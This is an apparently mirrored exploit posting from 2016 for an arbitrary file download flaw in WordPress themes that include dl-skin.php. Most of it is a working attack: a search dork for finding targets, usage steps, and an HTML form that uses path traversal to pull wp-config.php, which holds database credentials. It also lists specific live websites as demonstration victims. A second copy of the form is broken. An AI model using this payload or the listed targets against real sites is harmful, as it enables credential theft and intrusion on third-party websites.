WordPress Multi Themes Arbitrary File Download Vulnerability

发表于 2016年08月23日
Vulndb

Published：2016.08.23
Risk：High

WordPress Multi Themes文件下载漏洞

Exploit Title : WordPress Multi Themes Arbitrary File Download Vulnerability
Exploit Author : xBADGIRL21
Dork : wp-content/themes/ /lib/scripts/
Tested on: [ BackBox ]
skype:xbadgirl21
Date: 22/08/2016
video Proof : https://youtu.be/DFtF14_ShHk
Myblog : http://xbadgirl21.blogspot.com/

# [+] DESCRIPTION :
######################
# [+] WordPress Multi Themes Arbitrary File Download iT's an Exploit Allow Attackers to Download
# [+] Files From Your Website and The Vulnerable File is : dl-skin.php
# [+] so Any Theme WordPress Has This File Then he is Potentially Vulnerable

USAGE :

Use Dork Above [ok] +
Download Exploit File Edit it [ok] +
Edit: http://localhost/wp-content/themes/bonkersbeat/lib/scripts/dl-skin.php [ok] +
Edit: the value you want To Download [ok] +
Run Exploit +

# [+] Exploit:

<html>
<body>
<form action="http://localhost/wp-content/themes/awake/lib/scripts/dl-skin.php" method="post">
Download:<input type="text" name="_mysite_download_skin" value="../../../../../wp-config.php"><br>
<input type="submit">
</form>
</body>
</html>

<html>

<body>

Download:<input type="text" name="_mysite_download_skin" value="../../../../../wp-config.php"><br>

</form>

</body>

</html>

# [+] Live Demo :
######################
# http://www.bonkersbeat.com/wp-content/themes/bonkersbeat/lib/scripts/dl-skin.php
# http://www.aemdum.ca/test/wp-content/themes/method/lib/scripts/dl-skin.php
# http://www.tumct.org/wp-content/themes/awake/lib/scripts/dl-skin.php
# Discovered by : xBADGIRL21
# Greetz : All Mauritanien Hackers - NoWhere

### Note ### : Themes Vuln
#######################
# Vuln themes not all : https://ghostbin.com/paste/yg36k